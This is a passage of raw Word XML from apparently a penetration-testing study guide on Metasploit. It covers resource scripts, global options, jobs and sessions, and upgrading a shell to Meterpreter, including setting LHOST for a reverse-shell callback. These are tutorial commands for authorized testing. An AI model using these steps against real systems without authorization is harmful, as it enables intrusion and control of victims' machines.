                      <a:ext cx="4081463" cy="2250037"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l /usr/share/metasploit-framework/scripts/resource</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 94 shows that there are resource scripts provided for port scanning, brute forcing, protocol enumerations, and so on. Before we attempt to use them, we should thoroughly examine, understand, and modify them to fit our needs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000632">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some of these scripts use the global datastore of Metasploit to set options such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unset</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we define options in the context of a running module. However, we can also define values for options across all modules by setting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">global options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These options can be set with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and unset with</w:t>
      </w:r>
      <w:hyperlink r:id="rId166">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId167">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">unsetg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000633">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource scripts can be quite handy to automate parts of a penetration test. We can create a set of resource scripts for repetitive tasks and operations. We can prepare those scripts and then modify them for each penetration test. For example, we could prepare resource scripts for listeners, pivoting, post-exploitation, and much more. Using them on multiple penetration tests can save us a lot of time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000634">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's summarize what we learned in this section. We began by getting familiar with resource scripts. Then, we created our own resource script to automate the setup process of a multi/handler listener. Finally, we executed the resource script and a corresponding executable file to receive an incoming Meterpreter reverse shell, which migrated itself to a newly spawned Notepad process.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j86gzo3x9ntx" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs and Sessions:</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Sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at all sessions, use: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To interact with one session, use: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i [inset number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To background a session, use: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</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How to interact with sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View sessions: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000640">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go into session:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions -i [session_id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000641">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill session: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -k [session_id]</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How to interact with job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View jobs: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill job:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs -k [job_id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill all jobs:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs -K</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Jobs vs. Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000649">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will show all the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: background tasks that Metasploit is running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will show all the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A live connection to a target machine, usually gained after a successful exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7ta5x79p1511" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upgrade from a weak shell to a meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000651">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use sessions -u to Upgrade Automatically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000653">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000654">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out the session number of the shell you want to upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000655">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -u &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000656">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade the shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i &lt;new_sessions_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get into the session of the NEW shell. The old shell still exists in old session</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out which session you are in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get into the module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000660">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="144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661">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set SESSION &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000662">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST &lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000663">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000664">
      <w:pPr>
